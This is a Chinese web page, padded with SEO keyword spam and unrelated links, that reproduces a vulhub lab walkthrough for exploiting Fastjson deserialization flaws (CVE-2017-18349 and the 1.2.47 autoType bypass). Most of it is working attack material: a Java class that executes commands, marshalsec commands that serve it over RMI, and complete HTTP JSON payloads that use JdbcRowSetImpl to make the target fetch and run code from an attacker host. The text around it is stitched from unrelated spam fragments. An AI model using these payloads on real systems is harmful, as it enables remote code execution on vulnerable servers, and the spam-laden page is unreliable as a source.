当前位置: 首页 > news >正文

做物流网站多少钱明星百度指数排名

news 2025/12/14 15:25:51
做物流网站多少钱,明星百度指数排名,北京h5网站建设公司,个人 备案 多个网站一.fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349) fastjson在解析json的过程中#xff0c;支持使用autoType来实例化某一个具体的类#xff0c;并调用该类的set/get方法来访问属性。通过查找代码中相关的方法#xff0c;即可构造出一些恶意利用链 影响范围…一.fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349) fastjson在解析json的过程中支持使用autoType来实例化某一个具体的类并调用该类的set/get方法来访问属性。通过查找代码中相关的方法即可构造出一些恶意利用链 影响范围Fastjson1.2.24及之前版本 环境vulhub 工具下载 marshalsec.jar 1.生成class文件 //javac TouchFile.java 编译找到可执行文件javac在编译 import java.lang.Runtime; import java.lang.Process;public class TouchFile {static {try {Runtime rt Runtime.getRuntime();String[] commands {touch, /tmp/success};Process pc rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}} }2.开启http服务利用工具进行利用burp抓包 将编译好的class文件放到当前目录在当前目录下开启http服务 python -m http.server 8000使用 marshalsec工具开启rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.85.129:8000/#TouchFile 9999访问http://192.168.85.128:8090进行burp抓包发送一下数据包 POST / HTTP/1.1 Host: 192.168.85.128:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 164{b:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:rmi://192.168.85.129:9999/TouchFile,autoCommit:true} }3.进入容器shell查看文件 docker ps docker exec -it f780e8f24b90 /bin/bash cd /tmp ls二.Fastjson 1.2.47 远程命令执行漏洞(CNVD-2019-22238) Fastjson是阿里巴巴公司开源的一款json解析器其性能优越被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单而在1.2.48以前的版本中攻击者可以利用特殊构造的json字符串绕过白名单检测成功执行任意命令。 影响范围:Fastjson1.2.47以及之前的所有版本 环境vulhub 工具下载 marshalsec.jar 1.生成class文件 //javac TouchFile.java 编译找到可执行文件javac在编译 import java.lang.Runtime; import java.lang.Process;public class TouchFile {static {try {Runtime rt Runtime.getRuntime();String[] commands {touch, /tmp/success};Process pc rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}} }2.开启http服务利用工具进行利用burp抓包 将编译好的class文件放到当前目录在当前目录下开启http服务 python -m http.server 8000使用 marshalsec工具开启rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.85.129:8000/#TouchFile 9999访问http://192.168.85.128:8090进行burp抓包发送一下数据包 “dataSourceName”:“rmi://192.168.85.129:9999/Exploit和dataSourceName”:rmi://192.168.85.129:9999/TouchFile”都可以 POST / HTTP/1.1 Host: 192.168.85.128:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 164{a:{type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl},b:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:rmi://192.168.85.129:9999/Exploit,autoCommit:true} }3.进入容器shell查看文件 docker ps docker exec -it 2be14733a78a /bin/bash cd /tmp ls
http://wiki.neutronadmin.com/news/243277/

相关文章:

  • 如何做国际贸易网站零食店网站构建策划报告
  • 互联网客户做网站网站建设服务的会计处理
  • 免费黄页营销网站网站开发高级工程师
  • 东莞微网站建设费用有没有一个网站做黄油视频
  • 哪些网站平台可以做推广wordpress国内不使用方法
  • 个人做网站租云服务器最近播放中文版在线观看电视剧
  • 合肥市建设工程市场价格信息网站中国500强企业
  • 网站建设所需的软件邯郸自媒体有哪些
  • 如何给网站做防御成都网站维护
  • ps做网站图片水印中国建设银行网站的社保板块在哪里
  • 做网站如何分类宁波公司网站开发
  • 简述建设一个网站的一般过程阿里云网站建设方案书
  • 导航网站html模板外包接单网
  • 推广网站可以做跳转吗建设网站的费用属于
  • thinkphp2.1网站挂文件怎么做网站小图标
  • 设计方面的网站茌平网站建设菜谱制作
  • 哪个网站看电影做便宜网站友情链接检测
  • 教育机构网站源码网站文章内容排版要求
  • 邯郸网站制作哪家好苏州相城区网站建设
  • 上海网站建设 网站制作做网站需要简介
  • 做机械比较好的外贸网站做有趣的网站
  • 免费的软件下载网站国外做设备网站
  • 住房住房和城乡建设厅网站宝塔网站做301重定向
  • dw网站首页制作做网站需要招聘内容
  • 网站建设颊算wordpress 调用所有
  • 百度云wordpress建站wordpress 运费设置
  • 专门做养老院的网站网络公司属于什么行业
  • 手机网站大全观看搭建wordpress环境搭建
  • 免费建网站 手机网站wordpress 分页静态
  • wap网站服务器徽标设计制作